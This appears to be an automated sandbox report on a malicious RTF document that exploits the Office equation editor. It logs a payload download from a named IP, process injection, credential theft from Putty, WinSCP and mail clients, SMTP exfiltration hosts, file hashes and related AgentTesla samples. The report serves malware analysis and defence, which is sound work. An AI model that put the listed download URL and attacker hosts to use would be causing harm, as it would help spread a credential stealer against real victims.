                    /etc/passwd and /etc/shadow1
                    System Network Configuration Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                    Process Injection
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1482785 Sample: 2FBexXRCHR.rtf Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for dropped file 2->48 50 14 other signatures 2->50 8 WINWORD.EXE 291 13 2->8         started        process3 process4 10 EQNEDT32.EXE 12 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 34 198.46.174.139, 49163, 80 AS-COLOCROSSINGUS United States 10->34 24 C:\Users\user\AppData\Roaming\winiti.exe, PE32 10->24 dropped 26 C:\Users\user\AppData\Local\...\winiti[1].exe, PE32 10->26 dropped 60 Office equation editor establishes network connection 10->60 62 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->62 17 winiti.exe 1 7 10->17         started        file6 signatures7 process8 signatures9 36 Antivirus detection for dropped file 17->36 38 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->38 40 Machine Learning detection for dropped file 17->40 42 Injects a PE file into a foreign processes 17->42 20 winiti.exe 12 2 17->20         started        process10 dnsIp11 28 smtp.jlahuachem.com 20->28 30 208.91.198.143, 25 PUBLIC-DOMAIN-REGISTRYUS United States 20->30 32 4 other IPs or domains 20->32 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->52 54 Installs new ROOT certificates 20->54 56 Tries to steal Mail credentials (via file / registry access) 20->56 58 2 other signatures 20->58 signatures12

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    2FBexXRCHR.rtf53%VirustotalBrowse
                    2FBexXRCHR.rtf47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                    2FBexXRCHR.rtf100%AviraHEUR/Rtf.Malformed
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\winiti.exe100%AviraHEUR/AGEN.1308749
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe100%AviraHEUR/AGEN.1308749
                    C:\Users\user\AppData\Roaming\winiti.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe100%Joe Sandbox ML
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    us2.smtp.mailhostbox.com1%VirustotalBrowse
                    api.ipify.org0%VirustotalBrowse
                    smtp.jlahuachem.com0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://secure.comodo.com/CPS00%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                    http://tempuri.org/dxsss.xsd0%Avira URL Cloudsafe
                    http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe
                    https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
                    http://198.46.174.139/71/winiti.exej0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                    http://smtp.jlahuachem.com0%Avira URL Cloudsafe
                    http://us2.smtp.mailhostbox.com1%VirustotalBrowse
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
                    http://198.46.174.139/71/winiti.exe0%Avira URL Cloudsafe
                    http://198.46.174.139/71/winiti.0%Avira URL Cloudsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                    http://smtp.jlahuachem.com0%VirustotalBrowse
                    http://198.46.174.139/71/winiti.exekkC:0%Avira URL Cloudsafe
                    http://tempuri.org/dxsss.xsd1%VirustotalBrowse
                    https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    208.91.199.224
                    truefalseunknown
                    api.ipify.org
                    172.67.74.152
                    truefalseunknown
                    smtp.jlahuachem.com
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://198.46.174.139/71/winiti.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.orgwiniti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/dxsss.xsdwiniti.exe.2.dr, winiti[1].exe.2.drfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://account.dyn.com/winiti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.entrust.net/server1.crl0winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://us2.smtp.mailhostbox.comwiniti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.entrust.net03winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://support.google.com/chrome/?p=plugin_flashwiniti.exe, 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://198.46.174.139/71/winiti.exejEQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://smtp.jlahuachem.comwiniti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.ipify.org/twiniti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://ocsp.entrust.net0Dwiniti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewiniti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://secure.comodo.com/CPS0winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://198.46.174.139/71/winiti.EQNEDT32.EXE, 00000002.00000002.363861169.000000000032B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://198.46.174.139/71/winiti.exekkC:EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.entrust.net/2048ca.crl0winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    208.91.198.143
                    unknownUnited States
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                    208.91.199.225
                    unknownUnited States
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                    198.46.174.139
                    unknownUnited States
                    36352AS-COLOCROSSINGUStrue
                    208.91.199.223
                    unknownUnited States
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                    208.91.199.224
                    us2.smtp.mailhostbox.comUnited States
                    394695PUBLIC-DOMAIN-REGISTRYUSfalse
                    172.67.74.152
                    api.ipify.orgUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1482785
                    Start date and time:2024-07-26 06:38:10 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 4s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:2FBexXRCHR.rtf
                    renamed because original name is a hash value
                    Original Sample Name:02e73ef6a6bde5caa7628ee916111f60.rtf
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winRTF@7/9@4/6
                    EGA Information:
                    • Successful, ratio: 33.3%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 125
                    • Number of non-executed functions: 13
                    Cookbook Comments:
                    • Found application associated with file extension: .rtf
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 78981.3340972191 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3244 because there are no executed function
                    • Execution Graph export aborted for target winiti.exe, PID 3468 because it is empty
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    00:39:05API Interceptor307x Sleep call for process: EQNEDT32.EXE modified
                    00:39:08API Interceptor532708x Sleep call for process: winiti.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    208.91.198.143file.exeGet hashmaliciousSystemBCBrowse
                      file.exeGet hashmaliciousSystemBCBrowse
                        LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                          SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                            8hOkq9mMQu.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Order List Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                payment order.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  Mt103.exeGet hashmaliciousAgentTeslaBrowse
                                    PO-070724-WA00002.exeGet hashmaliciousAgentTeslaBrowse
                                      Swift Copy_98754.bat.exeGet hashmaliciousAgentTeslaBrowse
                                        208.91.199.225LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
                                          jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                            IEnetcache.htaGet hashmaliciousCobalt Strike, AgentTesla, PureLog StealerBrowse
                                              winiti.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                0RA0ngi2c2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  z1X3Z1ohoefF078ij.exeGet hashmaliciousAgentTeslaBrowse
                                                    Products and Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                      Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                        ATTACHMENT OF PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                          Luciana Alvarez CV.exeGet hashmaliciousAgentTeslaBrowse
                                                            198.46.174.139SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                                            • 198.46.174.139/41/winiti.exe
                                                            M6hS9qGbFx.rtfGet hashmaliciousAgentTeslaBrowse
                                                            • 198.46.174.139/42/winiti.exe
                                                            INV 66077.xlsGet hashmaliciousAgentTeslaBrowse
                                                            • 198.46.174.139/66077/winiti.exe
                                                            cz2afaNerh.rtfGet hashmaliciousAgentTeslaBrowse
                                                            • 198.46.174.139/66077/winiti.exe
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            us2.smtp.mailhostbox.comfile.exeGet hashmaliciousSystemBCBrowse
                                                            • 208.91.199.224
                                                            file.exeGet hashmaliciousSystemBCBrowse
                                                            • 208.91.199.223
                                                            LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            LisectAVT_2403002B_465.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            LCWGT83qLa.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.223
                                                            IEnetcache.htaGet hashmaliciousCobalt Strike, AgentTesla, PureLog StealerBrowse
                                                            • 208.91.199.225
                                                            api.ipify.orghttps://pub-bc1e99c17d21413c8c62ead228907d1f.r2.dev/auth_gen.html?folder=inf0gudkij&module&user-agent=Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.75+Safari/537.36Get hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                                            • 104.26.13.205
                                                            https://b14d.lnsd.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.26.13.205
                                                            LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            LisectAVT_2403002A_133.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            LisectAVT_2403002A_2.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            LisectAVT_2403002A_460.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            LisectAVT_2403002A_481.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                            • 104.26.12.205
                                                            LisectAVT_2403002A_63.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            LisectAVT_2403002A_59.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            PUBLIC-DOMAIN-REGISTRYUSfile.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.50.162.156
                                                            file.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.50.162.156
                                                            LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            LisectAVT_2403002A_16.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 199.79.62.115
                                                            LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
                                                            • 74.119.239.234
                                                            LisectAVT_2403002B_465.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.223
                                                            jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            PUBLIC-DOMAIN-REGISTRYUSfile.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.50.162.156
                                                            file.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.50.162.156
                                                            LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            LisectAVT_2403002A_16.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 199.79.62.115
                                                            LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
                                                            • 74.119.239.234
                                                            LisectAVT_2403002B_465.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.223
                                                            jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            PUBLIC-DOMAIN-REGISTRYUSfile.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.50.162.156
                                                            file.exeGet hashmaliciousSystemBCBrowse
                                                            • 103.50.162.156
                                                            LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            LisectAVT_2403002A_16.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 199.79.62.115
                                                            LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            SWIFT COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.224
                                                            LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
                                                            • 74.119.239.234
                                                            LisectAVT_2403002B_465.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.223
                                                            jRlq1fSUW5.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.199.225
                                                            SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 208.91.198.143
                                                            AS-COLOCROSSINGUSDBytisGNuD.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                            • 107.174.69.116
                                                            LisectAVT_2403002A_101.exeGet hashmaliciousRemcosBrowse
                                                            • 107.175.229.139
                                                            LisectAVT_2403002A_111.exeGet hashmaliciousTrickbotBrowse
                                                            • 108.174.60.238
                                                            042240724.xlsGet hashmaliciousRemcosBrowse
                                                            • 198.46.176.133
                                                            LisectAVT_2403002A_407.exeGet hashmaliciousRemcosBrowse
                                                            • 107.175.229.139
                                                            LisectAVT_2403002A_431.exeGet hashmaliciousRemcosBrowse
                                                            • 107.175.229.139
                                                            createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                                                            • 198.46.176.133
                                                            greatbunfeelsoftandhoney.gif.vbsGet hashmaliciousUnknownBrowse
                                                            • 198.46.176.133
                                                            LisectAVT_2403002B_38.exeGet hashmaliciousSalityBrowse
                                                            • 107.172.18.180
                                                            PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                                                            • 198.46.176.133
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            36f7277af969a6947a61ae0b815907a1042240724.xlsGet hashmaliciousRemcosBrowse
                                                            • 172.67.74.152
                                                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.74.152
                                                            S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 172.67.74.152
                                                            M6hS9qGbFx.rtfGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            DRWG-347RB1.pd.xlsGet hashmaliciousUnknownBrowse
                                                            • 172.67.74.152
                                                            Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.74.152
                                                            INV 66077.xlsGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            DRWG-347RB1.pd.xlsGet hashmaliciousFormBookBrowse
                                                            • 172.67.74.152
                                                            cz2afaNerh.rtfGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            R6UcgOy5nE.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 172.67.74.152
                                                            No context
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):671744
                                                            Entropy (8bit):7.848719392804634
                                                            Encrypted:false
                                                            SSDEEP:12288:6ChcU7r3FL0YtcCCvLLgov4CnDUOt7TDM2DG0oSb3fqEVzXfmhujHeis3c:Jco3FYYtajLX4stTA2DGbSeEUh+ei8c
                                                            MD5:3D33CBDE84D0A1197EC0D459D634473E
                                                            SHA1:ABD0074C5B2EED8FBAB4D30443CEAC4B403AD09D
                                                            SHA-256:33647CF1D7BA05386D44A608A94979925883F8E8C0E5F63B3F2E7FFDC7380461
                                                            SHA-512:36F31309DDDF020FD9FEE7C44D8847924C4F8A9306A7F04DFA15FD2B73645C982F98D4B7A616B2B31D4B3C14510F2858608BEDA519EB8475780B544A4EEDCEA1
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0......@......B.... ........@.. ... ...................@... ........@.....................................O............................ ....................................................... ............... ..H............text...H.... ....... .............. ..`.rsrc............ ..................@..@.reloc....... ... ... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:CE338FE6899778AACFC28414F2D9498B
                                                            SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                            SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                            SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):15872
                                                            Entropy (8bit):3.5588481165085604
                                                            Encrypted:false
                                                            SSDEEP:384:9pdVrvoJS3ISfCDpChMrYTwnqyEepBqsh:9jVrDYvVKMrYTwJBRh
                                                            MD5:FC30B68C73F56E933FF1BBA16C7D373E
                                                            SHA1:D49565EA429F49F648A6EBD7467C984EC11AF7E2
                                                            SHA-256:E01B02CE5304781F4F609B55EC49D38DC743D1414E23D7C49DAEDDC124DF7AAA
                                                            SHA-512:02A684F516FCD72E58A40EBD32447BA74A6F4380248E6A7BA163E9B8B1E73E7E9BBF6864AF9C9B354F0447539BDA8521303D2D62F011E2033F13F9A1A2FBD91F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......7.3.4.2.9.6.1.5.*.[.).1.<.,.7.!.!.8./...'.&.5.1.1.`.1.=.7.?.8.<.~.!..._.8.|.#.2...1._.~.?.-.+.3.^.?.;.~.~.?.?.[.:.'.0.>.?.8..._.].&.:.?.-.;.;.@.1...#./.#.+.$.%.?./.(.%...7...?.,.%.?.4.&.^.>.?.>.1.%.9.`.7.8.>.(.!.:.(.?.5.7.3.!.=.'.;.=.+.`.0.....0.?.7.~.!.?.*.>...=.@.].5.6...5.>.$.%.-.2...?.,.%.'.4.<.;...'.&.@...7.%.).*.).!.6.@.$.@.>.%.?.%.>.?.0.3.7.#.&.?.].5.:./.3.:.?.0.1.=.7.~.1.?.5.2._.*._.?...^.=.?.=.;.+.].6.?.9.'.?.?.+...2.8.`.;.:.#.?.:.?.7.&.(.'.5...=.5.?.?.~.%.5.?._.?.+.$.:._.:.3.!.4.^.$.].!.'.%...^...?.9.:.~.?.7.=.^.,.!.%.|.-...@.!._.+.....|.].[.%...?.#.%.0.<.$.;.-.&.-.].5.?.%.].|.,.;.`.6.&.$.8.%.,...!.*.4.<.&...3.5._...[.....%.).,.7.$.*.4.#.].?.:.*.7...$.%...2.?.-.?.-.6.!.'.,.0.?.#.].(.......[.%.&.6.?.?.^.$.|.-.^.1.<.6.~...6.?.#.'.>.0.|.3...&.<.$.3...+.%.`...#...<.?.6.7.5.?...<.!.[._.../.%.+.-.7.%.>.0.%.@.~.,._.?._.:.4.7.5.).$.%.+.`.1.?.~._.@.-.~.=.?.).`.?.~.'...7.;._.|.*.%.(.%.(.@.>...@.:.).?.'...6.%.,.[...).5.(.%.*.3.9.)...7.(.^.?.1.:.%.,.).,.%.+.:.`.^.?.?.$.'.?.?.5.~.:.
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1024
                                                            Entropy (8bit):0.05390218305374581
                                                            Encrypted:false
                                                            SSDEEP:3:ol3lYdn:4Wn
                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:11 2023, mtime=Fri Aug 11 15:42:11 2023, atime=Fri Jul 26 03:39:03 2024, length=92763, window=hide
                                                            Category:dropped
                                                            Size (bytes):1014
                                                            Entropy (8bit):4.5599068748513405
                                                            Encrypted:false
                                                            SSDEEP:12:8Rg5vFgXg/XAlCPCHaXKTBv/B/Pr+X+WYYwNXXnCoicvb4hxYl4LnCkDtZ3YilMh:8Rg5/XTAdswnCbeulnCkDv3qck7N
                                                            MD5:05EE14435E36168E47CD5C7634775A8F
                                                            SHA1:B25AFF4B0F7BC0B1E91BC4F21023B87B8C378726
                                                            SHA-256:77D57E0028863D545338F34C777DDF0172A4714E5C625FE325E33E98164987AD
